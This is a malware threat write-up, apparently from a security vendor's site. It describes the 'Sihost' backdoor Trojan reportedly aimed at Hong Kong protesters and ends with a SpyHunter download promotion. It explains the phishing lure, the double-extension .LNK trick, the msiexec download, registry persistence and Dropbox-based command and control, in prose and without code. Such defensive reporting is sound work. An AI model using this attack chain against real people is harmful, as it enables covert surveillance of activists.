The protests in Hong Kong have been lasting for quite a while now, and the Chinese government appears to be losing its patience and resorting to some innovative techniques. Recently, it was uncovered that Beijing had employed a threat actor to target the protesters in Hong Kong. The targeted protesters would receive an email that is masked as a message from a law student from the West. In the message, the attackers pretend to be interested in the protests and ask the recipient for 'recommendations to end the Hong Kong protests.' The attackers would attach three files to the fraudulent email - two genuine ones and one that appears as an '. RTF' document but is a '. LNK' file. Masking this corrupted file as a harmless document is done by using a double extension, a rather old but effective trick.
Uses a ‘.PNG’ File Masked as an Image
The '. LNK' files serve as a link, and in the case of this Beijing campaign, the '. LNK' file leads to a 'msiexec.exe' file, which is genuine. The '. LNK' file that is attached to the fake email has to execute the 'msiexec.exe' file and have it download a file from GitHub. The file in question appears to be a '. PNG' image, but it operates as an executable. This executable is used to generate hundreds of fake files. Among them is the initial payload that is located in 'siHost64.'
The %APPDATA% folder would contain a Python script called 'siHost64.' This script is meant to:
- Gain persistence by tampering with the Windows Registry.
- Establish a connection with the attackers' C&C (Command & Control) server, which operates with the help of the DropBox API.
- Uses the C&C server to grab files containing encrypted commands. Upon decrypting the commands, the threat will execute them. The results of these actions are stored in a new encrypted file. The threat will exfiltrate the file to the C&C server periodically.
In its essence, the Sihost threat is a tool for spying. This backdoor Trojan will allow its operators to gather information from the compromised host and transfer it to the attackers' server.
It is clear that the Sihost malware is not meant to target random users. This threat has a very low infection ratio, and its victims appear to be in the Chinese region, which has led experts to believe that the Sihost Trojan has been developed to target Honk Kong protesters exclusively. The threat is very well-developed, and it is clear that experienced cybercriminals have created the Sihost backdoor Trojan.
Do You Suspect Your PC May Be Infected with Sihost & Other Threats? Scan Your PC with SpyHunterSpyHunter is a powerful malware remediation and protection tool designed to help provide PC users with in-depth system security analysis, detection and removal of a wide range of threats like Sihost as well as a one-on-one tech support service. Download SpyHunter's FREE Malware Remover
Security Doesn't Let You Download SpyHunter or Access the Internet?Solutions: Your computer may have malware hiding in memory that prevents any program, including SpyHunter, from executing on your computer. Follow to download SpyHunter and gain access to the Internet:
- Use an alternative browser. Malware may disable your browser. If you're using IE, for example, and having problems downloading SpyHunter, you should open Firefox, Chrome or Safari browser instead.
- Use a removable media. Download SpyHunter on another clean computer, burn it to a USB flash drive, DVD/CD, or any preferred removable media, then install it on your infected computer and run SpyHunter's malware scanner.
- Start Windows in Safe Mode. If you can not access your Window's desktop, reboot your computer in "Safe Mode with Networking" and install SpyHunter in Safe Mode.
- IE Users: Disable proxy server for Internet Explorer to browse the web with Internet Explorer or update your anti-spyware program. Malware modifies your Windows settings to use a proxy server to prevent you from browsing the web with IE.